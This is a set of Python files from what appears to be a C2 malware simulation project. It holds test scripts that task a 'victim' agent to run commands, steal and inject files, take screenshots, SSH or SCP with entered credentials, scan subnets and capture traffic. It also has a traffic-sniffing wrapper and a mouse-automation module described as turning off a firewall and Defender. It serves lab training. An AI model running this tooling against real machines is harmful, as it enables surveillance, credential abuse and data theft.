if 'CERT_FILE' in CONFIG_DICT.keys() else 'cert.pem') keyPath = os.path.join(httpCertDir, CONFIG_DICT['KEY_FILE'] if 'KEY_FILE' in CONFIG_DICT.keys() else 'key.pem') ghttpsCertsInfo = (certPath, keyPath) #-------<GLOBAL INSTANCES (start with "i")>------------------------------------- # INSTANCES are the object. iDataMgr = None iSocketIO = None
4,214
Python
.py
97
40.979381
119
0.637339
LiuYuancheng/Ninja_C2_Malware_Simulation_System
8
2
0
GPL-3.0
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,474
malwareTest02.py
LiuYuancheng_Ninja_C2_Malware_Simulation_System/src/testCases/malwareTest02.py
import os import time from datetime import datetime import c2Client dirpath = os.path.dirname(__file__) class malwareTest(object): def __init__(self) -> None: self.malwareID = 'falsedataInjector-0' c2Ipaddr = '127.0.0.1' malownIP = '192.168.50.12' self.c2Connector = c2Client.c2Client(self.malwareID, c2Ipaddr, ownIP=malownIP) self.taskList = [ { 'taskID': 0, 'taskType': 'register', 'startT': datetime.now().strftime('%Y-%m-%d %H:%M:%S'), 'repeat': 1, 'exePreT': 0, 'taskData': None }, { 'taskID': 1, 'taskType': 'upload', 'startT': None, 'repeat': 1, 'exePreT': 0, 'taskData': [os.path.join(dirpath, "update_installer.zip")] }, { 'taskID': 2, 'taskType': 'download', 'startT': None, 'repeat': 1, 'exePreT': 0, 'taskData': ['2023-12-13_100327.png','NCL_SGX Service.docx'] }, ] self.c2Connector.registerToC2(taskList=self.taskList) self.c2Connector.start() def run(self): time.sleep(10) # test transfer file to C2 print("upload file") for taskDict in self.taskList: for _ in range(taskDict['repeat']): if taskDict['taskType'] == 'upload' or taskDict['taskType'] == 'download': time.sleep(int(taskDict['exePreT'])) uploadFlg = taskDict['taskType'] == 'upload' self.c2Connector.transferFiles(taskDict['taskData'], uploadFlg=uploadFlg) reportDict ={ 'taskID': taskDict['taskID'], 'state': c2Client.TASK_F_FLG, 'Time': datetime.now().strftime('%Y-%m-%d %H:%M:%S') } self.c2Connector.addNewReport(reportDict) def stop(self): self.c2Connector.stop() #----------------------------------------------------------------------------- #----------------------------------------------------------------------------- def main(): client = malwareTest() time.sleep(1) #client.run() time.sleep(5) client.stop() if __name__ == '__main__': main()
2,457
Python
.py
67
24.776119
93
0.455882
LiuYuancheng/Ninja_C2_Malware_Simulation_System
8
2
0
GPL-3.0
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,475
c2AppAPITest.py
LiuYuancheng_Ninja_C2_Malware_Simulation_System/src/testCases/c2AppAPITest.py
#!/usr/bin/python #----------------------------------------------------------------------------- # Name: c2AppAPITest.py [python3] # # Purpose: This module is the test case program used to test all the C2API. # # Author: Yuancheng Liu # # Created: 2024/05/23 # version: v0.2.2 # Copyright: Copyright (c) 2022 LiuYuancheng # License: MIT License #----------------------------------------------------------------------------- import os import sys print("Current working directory is : %s" % os.getcwd()) dirpath = os.path.dirname(os.path.abspath(__file__)) print("Current source code location : %s" % dirpath) APP_NAME = ('c2APItest', 'testCase') TOPDIR = 'src' LIBDIR = 'lib' idx = dirpath.find(TOPDIR) gTopDir = dirpath[:idx + len(TOPDIR)] if idx != -1 else dirpath # found it - truncate right after TOPDIR # Config the lib folder gLibDir = os.path.join(gTopDir, LIBDIR) if os.path.exists(gLibDir): sys.path.insert(0, gLibDir) import time import requests import c2Constants import c2Client #----------------------------------------------------------------------------- #----------------------------------------------------------------------------- ownID = 'API_Test_Program' malware1id = 'spyTrojan01' c2IP = ('127.0.0.1', 5000) httpsFlg = False c2Client = c2Client.c2Client(ownID, c2IP[0], c2Port=c2IP[1], downloadDir=dirpath, httpsFlg=httpsFlg) print("Connected to C2") #----------------------------------------------------------------------------- #----------------------------------------------------------------------------- def testcase1(): print("Test case 1: Download file via c2Client API Function") fileName = 'picctureTestDownload.png' filePath = os.path.join(dirpath, fileName) print("Downloading file %s" % filePath) c2Client.downloadfile(fileName, fileDir=dirpath) rst = 'Pass' if os.path.exists(filePath) else 'failed' print("- test result : %s" % rst) #----------------------------------------------------------------------------- def testcase2(): print("Test case 2: Download file via http request") jsonDict = {"filename": 'readme.pdf'} getUrl = "http://%s:%s/filedownload" % (c2IP[0], c2IP[1]) res = requests.get(getUrl, json=jsonDict, allow_redirects=True, verify=False) # set allow redirect to by pass load balancer filePath = os.path.join(dirpath, 'readme.pdf') if res.ok: with open(filePath, 'wb') as fh: fh.write(res.content) rst = 'Pass' if os.path.exists(filePath) else 'failed' print("- test result : %s" % rst) #----------------------------------------------------------------------------- def testcase3(): print("Test case 3: Upload file to C2 via c2Client API") fileName = 'update_installer.zip' filePath = os.path.join(dirpath, fileName) rst = c2Client.uploadfile(filePath) rst = 'Pass' if os.path.exists(filePath) else 'failed' print("- test result : %s" % rst) #----------------------------------------------------------------------------- def testcase4(): print("Test case 4: Download file via http request") fileName = 'update_installer.zip' filePath = os.path.join(dirpath, fileName) rst = False with open(filePath, 'rb') as fh: postUrl = "http://%s:%s/fileupload" % (c2IP[0], c2IP[1]) rst = requests.post(postUrl, files={'file': (fileName, fh.read())}, verify=False) rst = 'Pass' if os.path.exists(filePath) else 'failed' print("- test result : %s" % rst) #----------------------------------------------------------------------------- def testcase5(): print("Test case 5: Run commands on victim via c2Client API") global malware1id testTaskJson = { 'taskType' : c2Constants.TSK_TYPE_CMD, 'startT' : None, 'repeat' : 1, 'exePreT' : 0, 'state' : c2Constants.TASK_P_FLG, 'taskData' : ['ipconfig'] } c2Client.postTask(malware1id, testTaskJson) time.sleep(10) result = c2Client.getLastRst(malwareID=malware1id) print("- test result : %s" % result) #----------------------------------------------------------------------------- def testcase6(): print("Test case 6: Run commands on victim via http request") global malware1id jsonDict = { 'id' : malware1id, 'taskType' : 'command', 'startT' : None, 'repeat' : 1, 'exePreT' : 0, 'state' : 0, 'taskData' : ['dir'] } requests.post("http://%s:%s/taskPost" % (c2IP[0], c2IP[1]), json=jsonDict) time.sleep(10) result = c2Client.getLastRst(malwareID=malware1id) print("- test result : %s" % result) #----------------------------------------------------------------------------- def testcase7(): print("Test case 7: Steal file from victim to C2-DB via c2Client API") global malware1id filePath = os.path.join(dirpath, 'update_installer.zip') testTaskJson = { 'taskType' : c2Constants.TSK_TYPE_UPLOAD, 'startT' : None, 'repeat' : 1, 'exePreT' : 0, 'state' : c2Constants.TASK_P_FLG, 'taskData' : [filePath] } c2Client.postTask(malware1id, testTaskJson) time.sleep(10) result = c2Client.getLastRst(malwareID=malware1id) print("- test result : %s" % result) #----------------------------------------------------------------------------- def testcase8(): print("Test case 8: Steal file from victim to C2-DB via http request") global malware1id filePath = os.path.join(dirpath, 'update_installer.zip') jsonDict = { 'id' : malware1id, 'taskType' : 'upload', 'startT' : None, 'repeat' : 1, 'exePreT' : 0, 'state' : 0, 'taskData' : [filePath] } requests.post("http://%s:%s/taskPost" % (c2IP[0], c2IP[1]), json=jsonDict) time.sleep(10) result = c2Client.getLastRst(malwareID=malware1id) print("- test result : %s" % result) #----------------------------------------------------------------------------- def testcase9(): print("Test case 9: Inject file from C2-DB to victim via c2Client API") global malware1id testTaskJson = { 'taskType' : c2Constants.TSK_TYPE_DOWNLOAD, 'startT' : None, 'repeat' : 1, 'exePreT' : 0, 'state' : c2Constants.TASK_P_FLG, 'taskData' : ['picctureTestDownload.png'] } c2Client.postTask(malware1id, testTaskJson) time.sleep(10) result = c2Client.getLastRst(malwareID=malware1id) print("- test result : %s" % result) #----------------------------------------------------------------------------- def testcase10(): print("Test case 10: Inject file from C2-DB to victim via http request") global malware1id jsonDict = { 'id' : malware1id, 'taskType' : 'download', 'startT' : None, 'repeat' : 1, 'exePreT' : 0, 'state' : 0, 'taskData' : ['picctureTestDownload.png'] } requests.post("http://%s:%s/taskPost" % (c2IP[0], c2IP[1]), json=jsonDict) time.sleep(10) result = c2Client.getLastRst(malwareID=malware1id) print("- test result : %s" % result) #----------------------------------------------------------------------------- def testcase11(): print("Test case 11: Capture victim screenshot to C2-DB via c2Client API") global malware1id testTaskJson = { 'taskType' : c2Constants.TSK_TYPE_SCREENST, 'startT' : None, 'repeat' : 1, 'exePreT' : 0, 'state' : c2Constants.TASK_P_FLG, 'taskData' : 'None' } c2Client.postTask(malware1id, testTaskJson) time.sleep(10) result = c2Client.getLastRst(malwareID=malware1id) print("- test result : %s" % result) #----------------------------------------------------------------------------- def testcase12(): print("Test case 12: Capture victim screenshot to C2-DB via http request") global malware1id jsonDict = { 'id' : malware1id, 'taskType' : 'screenShot', 'startT' : None, 'repeat' : 1, 'exePreT' : 0, 'state' : 0, 'taskData' : None } requests.post("http://%s:%s/taskPost" % (c2IP[0], c2IP[1]), json=jsonDict) time.sleep(10) result = c2Client.getLastRst(malwareID=malware1id) print("- test result : %s" % result) #----------------------------------------------------------------------------- def testcase13(): print("Test case 13: SSH to target and tun command from victim via c2Client API") global malware1id targetIP = str(input("Input target IP/Domain : ")) userName = str(input("Input UserName : ")) password = str(input("Input Password : ")) command = str(input("Input command : ")) testTaskJson = { 'taskType': c2Constants.TSK_TYPE_SSH, 'startT': None, 'repeat': 1, 'exePreT': 0, 'state': c2Constants.TASK_P_FLG, 'taskData': ';'.join((targetIP, userName, password, command)) } c2Client.postTask(malware1id, testTaskJson) time.sleep(10) result = c2Client.getLastRst(malwareID=malware1id) print("- test result : %s" % result) #----------------------------------------------------------------------------- def testcase14(): print("Test case 14: SSH to target and tun command from victim via http request") global malware1id targetIP = str(input("Input target IP/Domain : ")) userName = str(input("Input UserName : ")) password = str(input("Input Password : ")) command = str(input("Input command : ")) jsonDict = { 'id' : malware1id, 'taskType' : 'sshRun', 'startT' : None, 'repeat' : 1, 'exePreT' : 0, 'state' : 0, 'taskData' : ';'.join((targetIP, userName, password, command)) } requests.post("http://%s:%s/taskPost" % (c2IP[0], c2IP[1]), json=jsonDict) time.sleep(10) result = c2Client.getLastRst(malwareID=malware1id) print("- test result : %s" % result) #----------------------------------------------------------------------------- def testcase15(): print("Test case 15: SCP file from victim to target via c2Client API") global malware1id targetIP = str(input("Input target IP/Domain : ")) userName = str(input("Input UserName : ")) password = str(input("Input Password : ")) filename = str(input("Input filename : ")) testTaskJson = { 'taskType': c2Constants.TSK_TYPE_SCP, 'startT': None, 'repeat': 1, 'exePreT': 0, 'state': c2Constants.TASK_P_FLG, 'taskData': ';'.join((targetIP, userName, password, filename)) } c2Client.postTask(malware1id, testTaskJson) time.sleep(10) result = c2Client.getLastRst(malwareID=malware1id) print("- test result : %s" % result) #----------------------------------------------------------------------------- def testcase16(): print("Test case 16: SCP file from victim to target via http request") global malware1id targetIP = str(input("Input target IP/Domain : ")) userName = str(input("Input UserName : ")) password = str(input("Input password : ")) command = str(input("Input filename : ")) jsonDict = { 'id' : malware1id, 'taskType' : 'scpFile', 'startT' : None, 'repeat' : 1, 'exePreT' : 0, 'state' : 0, 'taskData' : ';'.join((targetIP, userName, password, command)) } requests.post("http://%s:%s/taskPost" % (c2IP[0], c2IP[1]), json=jsonDict) time.sleep(10) result = c2Client.getLastRst(malwareID=malware1id) print("- test result : %s" % result) #----------------------------------------------------------------------------- def testcase17(): print("Test case 17: Scan victim sub-network IPs via c2Client API") global malware1id testTaskJson = { 'taskType': c2Constants.TSK_TYPE_SCANNET, 'startT': None, 'repeat': 1, 'exePreT': 0, 'state': c2Constants.TASK_P_FLG, 'taskData': '172.25.120.0/24' } c2Client.postTask(malware1id, testTaskJson) time.sleep(30) result = c2Client.getLastRst(malwareID=malware1id) print("- test result : %s" % result) #----------------------------------------------------------------------------- def testcase18(): print("Test case 18: Scan victim sub-network IPs via http request") global malware1id jsonDict = { 'id' : malware1id, 'taskType' : 'scanSubnet', 'startT' : None, 'repeat' : 1, 'exePreT' : 0, 'state' : 0, 'taskData' : '172.25.120.0/24' } requests.post("http://%s:%s/taskPost" % (c2IP[0], c2IP[1]), json=jsonDict) time.sleep(10) result = c2Client.getLastRst(malwareID=malware1id) print("- test result : %s" % result) #----------------------------------------------------------------------------- def testcase19(): print("Test case 19: Generate or record keyboard event via c2Client API") global malware1id testTaskJson = { 'taskType': c2Constants.TSK_TYPE_KEYBD, 'startT': None, 'repeat': 1, 'exePreT': 0, 'state': c2Constants.TASK_P_FLG, 'taskData': 'typeInStr;Hello world!' } c2Client.postTask(malware1id, testTaskJson) time.sleep(10) result = c2Client.getLastRst(malwareID=malware1id) print("- test result : %s" % result) #----------------------------------------------------------------------------- def testcase20(): print("Test case 20: Generate or record keyboard event via http request") global malware1id jsonDict = { 'id' : malware1id, 'taskType' : 'keyEvent', 'startT' : None, 'repeat' : 1, 'exePreT' : 0, 'state' : 0, 'taskData' : 'typeInStr;Hello world!' } requests.post("http://%s:%s/taskPost" % (c2IP[0], c2IP[1]), json=jsonDict) time.sleep(10) result = c2Client.getLastRst(malwareID=malware1id) print("- test result : %s" % result) #----------------------------------------------------------------------------- def testcase21(): print("Test case 21: EavesDrop victim's traffic in pcap file via c2Client API") global malware1id testTaskJson = { 'taskType': c2Constants.TSK_TYPE_EAVESDP, 'startT': None, 'repeat': 1, 'exePreT': 0, 'state': c2Constants.TASK_P_FLG, 'taskData': 'Wi-Fi;\\Device\\NPF_{172B21B5-878D-41B5-9C51-FE1DD27C469B};10' } c2Client.postTask(malware1id, testTaskJson) time.sleep(10) result = c2Client.getLastRst(malwareID=malware1id) print("- test result : %s" % result) #----------------------------------------------------------------------------- def testcase22(): print("Test case 22: EavesDrop victim's traffic in pcap file via http request") global malware1id jsonDict = { 'id' : malware1id, 'taskType' : 'eavesDrop', 'startT' : None, 'repeat' : 1, 'exePreT' : 0, 'state' : 0, 'taskData' : 'Wi-Fi;\\Device\\NPF_{172B21B5-878D-41B5-9C51-FE1DD27C469B};10' } requests.post("http://%s:%s/taskPost" % (c2IP[0], c2IP[1]), json=jsonDict) time.sleep(10) result = c2Client.getLastRst(malwareID=malware1id) print("- test result : %s" % result) #----------------------------------------------------------------------------- #----------------------------------------------------------------------------- def main(): global malware1id terminate = False print("Enter the agent id you want to connected with (if leave blank, use default 'spyTrojan01'): ") inputID = str(input()).strip() if inputID != '': malware1id = inputID while not terminate: print("-------------------------------------------------------------") print("0. exist test program") print("1. Download file via c2Client API") print("2: Download file via http request") print("3. Upload file to C2 via c2Client API") print("4. Upload file to C2 via http request") print("5. Run commands on victim via c2Client API") print("6. Run commands on victim via http request") print("7. Steal file from victim to C2-DB via c2Client API") print("8. Steal file from victim to C2-DB via http request") print("9. Inject file from C2-DB to victim via c2Client API") print("10. Inject file from C2-DB to victim via http request") print("11. Capture victim screenshot to C2-DB via c2Client API") print("12. Capture victim screenshot to C2-DB via http request") print("13. SSH to target and tun command from victim via c2Client API") print("14. SSH to target and tun command from victim via http request") print("15. SCP file from victim to target via c2Client API") print("16. SCP file from victim to target via http request") print("17. Scan victim sub-network IPs via c2Client API") print("18. Scan victim sub-network IPs via http request") print("19. Generate or record keyboard event via c2Client API") print("20. Generate or record keyboard event via http request") print("21. EavesDrop victim's traffic in pcap file via c2Client API") print("22. EavesDrop victim's traffic in pcap file via http request") selection = int(input("Enter your selection:")) if selection == 1: testcase1() elif selection == 2: testcase2() elif selection == 3: testcase3() elif selection == 4: testcase4() elif selection == 5: testcase5() elif selection == 6: testcase6() elif selection == 7: testcase7() elif selection == 8: testcase8() elif selection == 9: testcase9() elif selection == 10: testcase10() elif selection == 11: testcase11() elif selection == 12: testcase12() elif selection == 13: testcase13() elif selection == 14: testcase14() elif selection == 15: testcase15() elif selection == 16: testcase16() elif selection == 17: testcase17() elif selection == 18: testcase18() elif selection == 19: testcase19() elif selection == 20: testcase20() elif selection == 21: testcase21() elif selection == 22: testcase21() elif selection == 0: terminate = True else: terminate = True c2Client.stop() #----------------------------------------------------------------------------- if __name__ == '__main__': main()
19,793
Python
.py
480
33.5
127
0.512038
LiuYuancheng/Ninja_C2_Malware_Simulation_System
8
2
0
GPL-3.0
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,476
malwareTest00.py
LiuYuancheng_Ninja_C2_Malware_Simulation_System/src/testCases/malwareTest00.py
import os import time from datetime import datetime import c2MwUtils import c2Client dirpath = os.path.dirname(__file__) class malwareTest(object): def __init__(self) -> None: self.malwareID = 'testMalware1' c2Ipaddr = '127.0.0.1' malownIP = '192.168.50.11' self.c2Connector = c2Client.c2Client(self.malwareID, c2Ipaddr, ownIP=malownIP) self.taskList = [ { 'taskID': 0, 'taskType': 'register', 'startT': datetime.now().strftime('%Y-%m-%d %H:%M:%S'), 'repeat': 1, 'exePreT': 0, 'state' : c2MwUtils.TASK_R_FLG, 'taskData': None }, { 'taskID': 1, 'taskType': 'upload', 'startT': None, 'repeat': 1, 'exePreT': 0, 'state' : c2MwUtils.TASK_A_FLG, 'taskData': [os.path.join(dirpath, "update_installer.zip")] }, { 'taskID': 2, 'taskType': 'download', 'startT': None, 'repeat': 1, 'exePreT': 0, 'state' : c2MwUtils.TASK_A_FLG, 'taskData': ['2023-12-13_100327.png','NCL_SGX Service.docx'] }, ] self.c2Connector.registerToC2(taskList=self.taskList) self.c2Connector.start() def run(self): time.sleep(10) # test transfer file to C2 print("upload file") for taskDict in self.taskList: for _ in range(taskDict['repeat']): if taskDict['taskType'] == 'upload' or taskDict['taskType'] == 'download': time.sleep(int(taskDict['exePreT'])) uploadFlg = taskDict['taskType'] == 'upload' self.c2Connector.transferFiles(taskDict['taskData'], uploadFlg=uploadFlg) reportDict ={ 'taskID': taskDict['taskID'], 'state': c2Client.TASK_F_FLG, 'Time': datetime.now().strftime('%Y-%m-%d %H:%M:%S') } self.c2Connector.addNewReport(reportDict) def stop(self): self.c2Connector.stop() #----------------------------------------------------------------------------- #----------------------------------------------------------------------------- def main(): client = malwareTest() time.sleep(1) client.run() for i in range(100): time.sleep(1) print(i) client.stop() if __name__ == '__main__': main()
2,656
Python
.py
73
24.506849
93
0.458609
LiuYuancheng/Ninja_C2_Malware_Simulation_System
8
2
0
GPL-3.0
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,477
malwareTest01.py
LiuYuancheng_Ninja_C2_Malware_Simulation_System/src/testCases/malwareTest01.py
import os import time from datetime import datetime import c2MwUtils import c2Client dirpath = os.path.dirname(__file__) class malwareTest(object): def __init__(self) -> None: self.malwareID = 'backdoorTrojan-0' c2Ipaddr = '127.0.0.1' malownIP = '192.168.50.13' self.c2Connector = c2Client.c2Client(self.malwareID, c2Ipaddr, ownIP=malownIP) self.taskList = [ { 'taskID': 0, 'taskType': 'register', 'startT': datetime.now().strftime('%Y-%m-%d %H:%M:%S'), 'repeat': 1, 'exePreT': 0, 'state' : c2MwUtils.TASK_R_FLG, 'taskData': None }, { 'taskID': 1, 'taskType': 'upload', 'startT': None, 'repeat': 1, 'exePreT': 0, 'state' : c2MwUtils.TASK_A_FLG, 'taskData': [os.path.join(dirpath, "update_installer.zip")] }, { 'taskID': 2, 'taskType': 'download', 'startT': None, 'repeat': 1, 'exePreT': 0, 'state' : c2MwUtils.TASK_A_FLG, 'taskData': ['2023-12-13_100327.png','NCL_SGX Service.docx'] }, ] self.c2Connector.registerToC2(taskList=self.taskList) self.c2Connector.start() def run(self): time.sleep(10) # test transfer file to C2 print("upload file") for taskDict in self.taskList: for _ in range(taskDict['repeat']): if taskDict['taskType'] == 'upload' or taskDict['taskType'] == 'download': time.sleep(int(taskDict['exePreT'])) uploadFlg = taskDict['taskType'] == 'upload' self.c2Connector.transferFiles(taskDict['taskData'], uploadFlg=uploadFlg) reportDict ={ 'taskID': taskDict['taskID'], 'state': c2Client.TASK_F_FLG, 'Time': datetime.now().strftime('%Y-%m-%d %H:%M:%S') } self.c2Connector.addNewReport(reportDict) def stop(self): self.c2Connector.stop() #----------------------------------------------------------------------------- #----------------------------------------------------------------------------- def main(): client = malwareTest() time.sleep(1) #client.run() time.sleep(5) client.stop() if __name__ == '__main__': main()
2,616
Python
.py
71
24.873239
93
0.458958
LiuYuancheng/Ninja_C2_Malware_Simulation_System
8
2
0
GPL-3.0
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,478
tsharkUtils.py
LiuYuancheng_Ninja_C2_Malware_Simulation_System/src/lib/tsharkUtils.py
#----------------------------------------------------------------------------- # Name: tsharkUtils.py # # Purpose: This module is a untility module of the lib <python-pyshark> to # provide some extend traffic load and capturefunctions. The program # needs to work with the below lib / software installed: # - pyshark: https://pypi.org/project/pyshark/ # - tshark module of wireshark: https://www.wireshark.org/ # # Author: Yuancheng Liu # # Version: v_0.1.1 # Created: 2024/03/07 # Copyright: Copyright (c) 2024 LiuYuancheng # License: MIT License #----------------------------------------------------------------------------- """ Program design: We want to create a OOP WireShark wrapper program which can be used as lib for other program to capture the host traffic. (Such as used by the spytrojan) to eavesdroping / mirroring the victim's network communication. Additional Info: - To get the device interface info, For Windows platform run: 'D:\Tools\Wireshark>tshark -D' to list all the network interfaces - Display filter doc: https://wiki.wireshark.org/DisplayFilters """ import os import psutil import pyshark # https://github.com/KimiNewt/pyshark MAX_TIMEOUT = 1800 # maximum packet capture time 1800 sec in one round. MAX_PACKET_COUNT = 10000 # maximum number of packets capture in one round #----------------------------------------------------------------------------- #----------------------------------------------------------------------------- class trafficSniffer(object): """ Main traffic sniffer program.""" def __init__(self, debugFlg=False) -> None: self.packetList = None self.captureFilePath = None self.maxTimeout = MAX_TIMEOUT self.maxPctnum = MAX_PACKET_COUNT self.crtNicInfo = { "name": None, "interface": None # in linux system the interface is same as the name } self.debugMD = debugFlg #----------------------------------------------------------------------------- def getLastCaptureFilePath(self): return self.captureFilePath #----------------------------------------------------------------------------- def getlastCaptureData(self, index=None): if self.packetList is None or len(self.packetList)==0: return None if index is None: return self.packetList elif int(index) < len(self.packetList): return self.packetList[index] else: print("Idx out of range") return None #----------------------------------------------------------------------------- def loadCapFile(self, filePath, decryptionkKey=None): """ Load the network packet capture file (*.cap, *.pcap, *.pcapng) Args: filePath ([str]): pcap file path. """ if os.path.exists(filePath): capture = pyshark.FileCapture(filePath, decryption_key=str(decryptionkKey)) self.packetInfoLines = [str(cap).split('\n') for cap in capture] if self.debugMD: print(str(self.packetInfoLines)) return True print(">> Error: loadCapFile() file %s not found." % str(filePath)) return False #----------------------------------------------------------------------------- def resetSniffer(self): self.packetList = [] self.captureFilePath = None self.crtNicInfo = { "name": None, "interface": None } # in linux system the interface is same as the name def setMaxTimeout(self, maxTimeout): self.maxTimeout = int(maxTimeout) def setMaxPecketNum(self, maxPacketNum): self.maxPctnum = int(maxPacketNum) #----------------------------------------------------------------------------- def setNicInfo(self, nicName, deviceAddr): """ Set the current sniff network interface information. Args: nicName (str): NIC name deviceAddr (str): interface ID. """ nicList = psutil.net_if_addrs() if nicName in nicList.keys(): self.crtNicInfo['name'] = nicName self.crtNicInfo['interface'] = deviceAddr self.packetList = [] return True print(">> Error: the NIC name is not found on the target") return False #----------------------------------------------------------------------------- def capture2File(self, filePath, displayFilter=None, timeoutInt=30): """ Capture the packet to file. If applied the filter, only capture the packet which match the filter. Args: filePath (str): pcap file path displayFilter (str, optional): display filter https://wiki.wireshark.org/DisplayFilters Defaults to None. timeoutInt (int, optional): Capture time. Defaults to 30. Returns: bool: True if capture successful. False if the interface not config. """ if self.crtNicInfo['interface'] is None: return False timeoutInt = int(min(timeoutInt, self.maxTimeout)) if not str(filePath).lower().endswith('.pcap'): filePath+='.pcap' self.captureFilePath = filePath # Pre create the pcap file: if not os.path.exists(self.captureFilePath): try: with open(self.captureFilePath, 'w') as fp: print("Created the pcap file %s" %str(self.captureFilePath)) except Exception as err: print(">> Error: capture2File() unable to create pcap file: %s" % str(err)) return False capture = pyshark.LiveCapture(interface=self.crtNicInfo['interface'], output_file=filePath, display_filter=displayFilter) print("Start to capture interface [%s] to file, timeout=%s." % (self.crtNicInfo['name'], str(timeoutInt))) capture.sniff(timeout=timeoutInt) print("Capture finished.") return True #----------------------------------------------------------------------------- def capture2Mem(self, displayFilter=None, packetCount=20): """ Capture the packet in the memory <self.packetList> Args: displayFilter (str, optional): display filter. Defaults to None. packetCount (int, optional): number of packet which can match to the filter. Defaults to 20. Returns: bool: True if capture successful. False if the interface not config. """ if self.crtNicInfo['interface'] is None: return False packetCount = int(min(packetCount, self.maxPctnum)) capture = pyshark.LiveCapture(interface=self.crtNicInfo['interface'], display_filter=displayFilter) print("Start to capture interface [%s] to file, packetNum=%s." % (self.crtNicInfo['name'], str(packetCount))) for captureArr in capture.sniff_continuously(packet_count=packetCount): self.packetList.append(captureArr) return True #----------------------------------------------------------------------------- #----------------------------------------------------------------------------- def testCase(mode=0): sniffer = trafficSniffer(debugFlg=True) dirpath = os.path.dirname(__file__) sniffer.setNicInfo('Wi-Fi', '\\Device\\NPF_{172B21B5-878D-41B5-9C51-FE1DD27C469B}') if mode == 0: print("Test case 0: sniff traffic to pcap file.") snifFileName = os.path.join(dirpath, "test.pcap") sniffer.capture2File(snifFileName, timeoutInt=10) print("file path: %s" %str(sniffer.getLastCaptureFilePath())) elif mode == 1: print("Test case 1: sniff to memory") sniffer.capture2Mem(packetCount=10) data = sniffer.getlastCaptureData() for packet in data: print(packet) elif mode == 2: # This test need to run ping google.com cmd during the exection. print("Test case 2: sniff to memory with filter") filterStr = 'icmp' sniffer.capture2Mem(displayFilter=filterStr, packetCount=2) data = sniffer.getlastCaptureData() for packet in data: print(packet) else: # add the new test case pass #----------------------------------------------------------------------------- if __name__ == '__main__': mode = 0 print("Please type in the test case number you want to run: ") uInput = str(input()) mode = int(uInput) testCase(mode)
8,740
Python
.py
180
39.672222
117
0.545316
LiuYuancheng/Ninja_C2_Malware_Simulation_System
8
2
0
GPL-3.0
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,479
mouseEventActor.py
LiuYuancheng_Ninja_C2_Malware_Simulation_System/src/lib/mouseEventActor.py
#!/usr/bin/python #----------------------------------------------------------------------------- # Name: mouseEventActor.py # # Purpose: This module will provide function to record and playback user's # mouse action and use CV to detect the match area in the screen and # move mouse to the position to click. # # Author: Yuancheng Liu # # Version: v_0.0.2 # Created: 2022/01/11 # Copyright: Copyright (c) 2022 LiuYuancheng # License: MIT License #----------------------------------------------------------------------------- """ This simple module is used to turn off the firewall and windefender in LS2022: 1. Use "win32gui" (input the app name/filename) to make the app window show in the front ground above all other windows. 2. Use "pyscreenshot" capture the screen shot. 3. Use the "openCV cv2" to find the screen shot position(x, y) which matches the text field/button template we want to find. 4. Use the "mouse" to move the mouse cursor to the position(x,y) and click. 5. Use the "keyboard" to input the pre-setup text. """ import os import cv2 import time from datetime import datetime import threading import mouse import pyscreenshot print("Current working directory is : %s" % os.getcwd()) dirpath = os.path.dirname(os.path.abspath(__file__)) print("Current source code location : %s" % dirpath) DEF_DATA_DIR = 'data' DEF_SS_NAME = 'screenshot.png' # default screenshot name #----------------------------------------------------------------------------- #----------------------------------------------------------------------------- class mouseRecorder(threading.Thread): """ Module used to record the user's mouse trace and click actions and play back in background thread. """ def __init__(self, threadID=None) -> None: """ Init example: recorder = mouseRecorder() recorder.start() Args: threadID (int, optional): thread ID for multi-threading managment. Defaults to None. """ threading.Thread.__init__(self) self.threadID = 0 if not threadID else threadID self.eventList = [] # list to record the mouse event self.recordingFlg = False self.playingFlg = False self.terminate = False #----------------------------------------------------------------------------- def clearRecord(self): self.eventList = [] def getthreadID(self): return self.threadID def getRecord(self): return self.eventList #----------------------------------------------------------------------------- def run(self): """ Thread running backgound loop to playback mouse trace. """ while(not self.terminate): if self.playingFlg: if len(self.eventList): print("Start to playback the record.") mouse.play(self.eventList) else: print("Warning: the mouse event list is empty. Please record it first.") else: time.sleep(1) #----------------------------------------------------------------------------- def startNewRecord(self): """ Start a new mouse event recording.""" if self.recordingFlg: print("Warning: the mouse event is already recording. Please stop it first.") return False else: self.clearRecord() mouse.hook(self.eventList.append) self.recordingFlg = True return True #----------------------------------------------------------------------------- def stopRecord(self): if self.recordingFlg: mouse.unhook(self.eventList.append) self.recordingFlg = False return True else: print("Warning: the mouse event is not recording. Please start it first.") return False #----------------------------------------------------------------------------- def startPlayback(self): if self.playingFlg: print("Warning: the mouse event is already playing. Please stop it first.") return False else: if self.recordingFlg: self.stopRecord() # stop record before playback self.playingFlg = True def stop(self): self.terminate = True #----------------------------------------------------------------------------- #----------------------------------------------------------------------------- class screenPosClicker(object): def __init__(self) -> None: self.dataDir = os.path.join(dirpath, 'data') if not os.path.isdir(self.dataDir): os.mkdir(self.dataDir) self.clickTemplatePath = None #----------------------------------------------------------------------------- def findTemplatePos(self, srcImgPath, templatePath, recordRst=False): """ Find the template image center position in the source image. Args: srcImgPath (str): source image path templatePath (str): template need to find image path. recordRst (bool, optional): flag to identify whether mark result on source file. Defaults to False. Returns: (int, int): center position (x, y) to find the template image. if any x or y < 0, it means the template image is not found in the source. """ srcImg = cv2.imread(srcImgPath) srcGray = cv2.cvtColor(srcImg, cv2.COLOR_BGR2GRAY) tmpImg = cv2.imread(templatePath, 0) result = cv2.matchTemplate(srcGray, tmpImg, cv2.TM_CCOEFF) min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(result) height, width = tmpImg.shape[:2] top_left = max_loc bottom_right = (top_left[0] + width, top_left[1] + height) pos_XY = (int((top_left[0]+bottom_right[0])/2), int((top_left[1]+bottom_right[1])/2)) # Draw detection result on the src image if recordRst: print("Draw detection result on the src image") cv2.rectangle(srcImg, top_left, bottom_right, (0, 0, 255), 3) font = cv2.FONT_HERSHEY_SIMPLEX fontScale = 0.7 org = (top_left[0], top_left[1]-10) rstImage = cv2.putText(srcImg, 'find match: at %s' % str(pos_XY), org, font, fontScale, (0, 0, 255), 1, cv2.LINE_AA) cv2.imwrite(srcImgPath, rstImage) return pos_XY #----------------------------------------------------------------------------- def setClickTemplate(self, templatePath): if os.path.exists(templatePath): 